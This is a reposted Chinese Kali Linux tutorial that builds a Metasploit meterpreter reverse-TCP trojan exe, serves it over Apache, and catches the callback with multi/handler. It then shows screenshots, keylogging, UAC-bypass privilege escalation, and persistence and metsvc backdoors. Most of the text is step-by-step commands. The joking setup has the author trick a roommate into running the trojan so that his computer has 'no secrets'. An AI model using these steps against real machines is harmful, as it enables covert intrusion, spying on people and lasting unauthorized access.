kali渗透-基础篇
滲透之meterpreter
模擬場(chǎng)景:小明是我室友,整天游戲人生,渾渾噩噩,前途迷茫,每次上課交作業(yè)都要看我的,于是我開(kāi)啟了apche服務(wù)器,給他下載作業(yè)(別問(wèn)我為什么不用QQ傳,因?yàn)橐b逼!),他無(wú)意中看到我的一些其他軟件,并也一起打包下載了,并且運(yùn)行了一個(gè)*.exe程序,嘿嘿,從此他的電腦上便再無(wú)秘密可言。
?
0x1.實(shí)驗(yàn)環(huán)境
VMware
kali(linux)系統(tǒng) kali ip:192.168.127.128
windows 7專(zhuān)業(yè)版
kali鏡像官方下載地址->>https://www.kali.org/downloads/
0x2.開(kāi)始實(shí)驗(yàn)
0x2.1.終端進(jìn)入msfconsole控制臺(tái)
輸入->>msfconsole? ? ? 回車(chē)即可
生成木馬程序
輸入->>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.127.128 LPORT=4444 -f exe > 1.exe
提示:命令中的ip地址為kali IP地址,端口號(hào)可自行設(shè)定(盡量設(shè)置為不常用端口號(hào)),1.exe為木馬程序,名字隨意,由.exe結(jié)尾即可。
開(kāi)啟一個(gè)新終端
開(kāi)啟apache服務(wù),將默認(rèn)主頁(yè)刪除并復(fù)制1.exe文件到該目錄下
輸入->>service apache2 start
->>rm /var/www/html/*
->>cp 1.exe /var/www/html/
win7在同一局域網(wǎng)內(nèi)主機(jī)就可以訪問(wèn)到:http://192.168.127.128:80
win7點(diǎn)擊1.exe文件即可下載,現(xiàn)在我們將該文件下載下來(lái)放到桌面上運(yùn)行。
回到kali的msf上,使用監(jiān)聽(tīng)模塊,設(shè)置一些參數(shù),輸入options即可查看需要設(shè)置的參數(shù)。
輸入->>use exploit/multi/handler
->>set payload windows/meterpreter/reverse_tcp
->>set LHost 192.168.127.128
->>set LPORT 4444
提示:IP為kali IP地址,端口為之前生成1.exe時(shí)端口,默認(rèn)端口為4444
執(zhí)行exploit即可連上win7了
查看當(dāng)前權(quán)限
輸入命令->>getuid
顯示系統(tǒng)權(quán)限,那就可以做很多事情了。
可能做到這里就只有用戶(hù)權(quán)限了,那也是沒(méi)關(guān)系的!
可以先試試獲取遠(yuǎn)端桌面截屏,記錄鍵盤(pán)等
截屏操作
輸入->>screenshot
還有就是鍵盤(pán)記錄,你輸了什么我都知道,哈哈哈。
如果不是system權(quán)限或administrator權(quán)限就需要提權(quán)。
shell命令打開(kāi)win7終端
提權(quán)
說(shuō)明:本來(lái)我第一次做的時(shí)候拿到的也是用戶(hù)權(quán)限,找了一些資料,試了幾種方法均未成功,后來(lái)看到一篇win7提權(quán)的,終于成功了!
以exploit/windows/local/bypassuac模塊為例
該模塊在windows 32位和64位下都有效。
msf > use exploit/windows/local/bypassuac->> set session 2->> exploit用sessions命令就可以看到自己的編號(hào)了,我這里是2
植入后門(mén)
提升權(quán)限完第一件事就是留后門(mén)了。
現(xiàn)在只不過(guò)是放了一個(gè)馬而已,下次啟動(dòng)就不運(yùn)行了,這怎么行!所以我們得留個(gè)后門(mén)啊!
輸入->>run persistence -X -i 5 -p 4444 -r 192.168.127.128
-X為開(kāi)機(jī)自啟 -i為反向連接
metsvc攻擊
開(kāi)啟一個(gè)會(huì)話服務(wù)
輸入->>run metsvc
win7上已經(jīng)有了。
?
參考來(lái)自-》》https://xz.aliyun.com/t/2536#toc-2
-》》https://paper.seebug.org/29/
提權(quán)文章使用的是->>https://www.cnblogs.com/wh4am1/p/6602650.html方法,可以嘗試其他方法進(jìn)行提權(quán)哦!
轉(zhuǎn)載于:https://www.cnblogs.com/gh747/p/10653596.html
總結(jié)
以上是生活随笔為你收集整理的kali渗透-基础篇的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 一个小程序的首页对接后端实现用户注册
- 下一篇: [19/04/04-星期四] IO技术_